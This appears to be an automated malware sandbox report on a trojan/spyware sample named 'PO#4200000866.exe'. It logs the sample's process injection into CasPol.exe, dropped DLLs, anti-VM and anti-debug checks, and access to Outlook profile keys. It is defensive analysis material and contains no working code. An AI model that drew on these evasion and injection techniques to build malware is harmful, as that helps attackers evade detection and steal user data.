            Source: PO#4200000866.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\PO#4200000866.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dllJump to behavior
            Source: PO#4200000866.exeStatic PE information: invalid certificate
            Source: library.dll.1.drStatic PE information: Section .rsrc
            Source: PO#4200000866.exeVirustotal: Detection: 10%
            Source: C:\Users\user\Desktop\PO#4200000866.exeFile read: C:\Users\user\Desktop\PO#4200000866.exeJump to behavior
            Source: PO#4200000866.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\PO#4200000866.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\PO#4200000866.exe "C:\Users\user\Desktop\PO#4200000866.exe"
            Source: C:\Users\user\Desktop\PO#4200000866.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO#4200000866.exe"
            Source: C:\Users\user\Desktop\PO#4200000866.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO#4200000866.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\PO#4200000866.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO#4200000866.exe" Jump to behavior
            Source: C:\Users\user\Desktop\PO#4200000866.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO#4200000866.exe" Jump to behavior
            Source: C:\Users\user\Desktop\PO#4200000866.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\PO#4200000866.exeFile created: C:\Users\user\AppData\Local\Temp\nshFE95.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/12@4/1
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_004021AA CoCreateInstance,1_2_004021AA
            Source: C:\Users\user\Desktop\PO#4200000866.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_00404AB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3884:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3884:304:WilStaging_02
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: PO#4200000866.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: D:\SourceCode\DevicePlugin\production_V4.2\Service\ServiceSDK\Release\DeviceServicePlugin\DeviceServicePlugin.pdb source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr
            Source: Binary string: D:\SourceCode\DevicePlugin\production_V4.2\Service\ServiceSDK\Release\DeviceServicePlugin\DeviceServicePlugin.pdb22 source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000008.00000000.41902252759.0000000001120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_715D30C0 push eax; ret 1_2_715D30EE
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7DB69 push ebp; ret 1_2_03C7DB17
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C752A5 push esp; ret 1_2_03C752B5
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7A24F push eax; ret 1_2_03C7A254
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C78E64 push ebp; ret 1_2_03C78EAC
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C78E72 push ebp; ret 1_2_03C78EAC
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C70D98 push ebp; ret 1_2_03C70E1A
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7BC4B push edi; iretd 1_2_03C7BC67
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7643A push edx; ret 1_2_03C7643B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_01048497 push edi; retn 0000h8_2_01048499
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_010428E3 push eax; retf 8_2_010428E9
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_715D1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_715D1BFF
            Source: C:\Users\user\Desktop\PO#4200000866.exeFile created: C:\Users\user\AppData\Local\Temp\library.dllJump to dropped file
            Source: C:\Users\user\Desktop\PO#4200000866.exeFile created: C:\Users\user\AppData\Local\Temp\nsdFF63.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\PO#4200000866.exeFile created: C:\Users\user\AppData\Local\Temp\DeviceServicePlugin.dllJump to dropped file
            Source: C:\Users\user\Desktop\PO#4200000866.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\PO#4200000866.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\PO#4200000866.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: PO#4200000866.exe, 00000001.00000002.42101669315.0000000003D71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: PO#4200000866.exe, 00000001.00000002.42101669315.0000000003D71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4436Thread sleep time: -10145709240540247s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\PO#4200000866.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\library.dllJump to dropped file
            Source: C:\Users\user\Desktop\PO#4200000866.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DeviceServicePlugin.dllJump to dropped file
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C71BC0 rdtsc 1_2_03C71BC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9323Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_1D6B0C40 sldt word ptr [eax]8_2_1D6B0C40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405D74
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_0040699E FindFirstFileW,FindClose,1_2_0040699E
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\PO#4200000866.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\PO#4200000866.exeAPI call chain: ExitProcess graph end nodegraph_1-17168
            Source: C:\Users\user\Desktop\PO#4200000866.exeAPI call chain: ExitProcess graph end nodegraph_1-16947
            Source: PO#4200000866.exe, 00000001.00000002.42101961509.0000000005709000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: PO#4200000866.exe, 00000001.00000002.42101961509.0000000005709000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
            Source: PO#4200000866.exe, 00000001.00000002.42101961509.0000000005709000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: PO#4200000866.exe, 00000001.00000002.42101961509.0000000005709000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: PO#4200000866.exe, 00000001.00000002.42101669315.0000000003D71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
            Source: PO#4200000866.exe, 00000001.00000002.42101961509.0000000005709000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 00000008.00000002.46715733863.0000000001446000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46715072344.00000000013E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: PO#4200000866.exe, 00000001.00000002.42101669315.0000000003D71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: PO#4200000866.exe, 00000001.00000002.42101961509.0000000005709000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: PO#4200000866.exe, 00000001.00000002.42101961509.0000000005709000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: PO#4200000866.exe, 00000001.00000002.42101961509.0000000005709000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: CasPol.exe, 00000008.00000002.46717254333.0000000002F99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_715D1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_715D1BFF
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C71BC0 rdtsc 1_2_03C71BC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7B3DE mov eax, dword ptr fs:[00000030h]1_2_03C7B3DE
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C83362 mov eax, dword ptr fs:[00000030h]1_2_03C83362
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C832E6 mov eax, dword ptr fs:[00000030h]1_2_03C832E6
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7B28A mov ebx, dword ptr fs:[00000030h]1_2_03C7B28A
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7B240 mov ebx, dword ptr fs:[00000030h]1_2_03C7B240
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7B240 mov eax, dword ptr fs:[00000030h]1_2_03C7B240
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C81E75 mov eax, dword ptr fs:[00000030h]1_2_03C81E75
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7B1CD mov eax, dword ptr fs:[00000030h]1_2_03C7B1CD
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C815FF mov eax, dword ptr fs:[00000030h]1_2_03C815FF
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7E542 mov eax, dword ptr fs:[00000030h]1_2_03C7E542
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7B168 mov eax, dword ptr fs:[00000030h]1_2_03C7B168
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7B126 mov eax, dword ptr fs:[00000030h]1_2_03C7B126
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7A8DD mov eax, dword ptr fs:[00000030h]1_2_03C7A8DD
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7B080 mov eax, dword ptr fs:[00000030h]1_2_03C7B080
            Source: C:\Users\user\Desktop\PO#4200000866.exeCode function: 1_2_03C7B003 mov eax, dword ptr fs:[00000030h]1_2_03C7B003
            Source: C:\Users\user\Desktop\PO#4200000866.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 8_2_0104EFC0 LdrInitializeThunk,8_2_0104EFC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\PO#4200000866.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1120000Jump to behavior
            Source: C:\Users\user\Desktop\PO#4200000866.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO#4200000866.exe" Jump to behavior
            Source: C:\Users\user\Desktop\PO#4200000866.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PO#4200000866.exe" Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
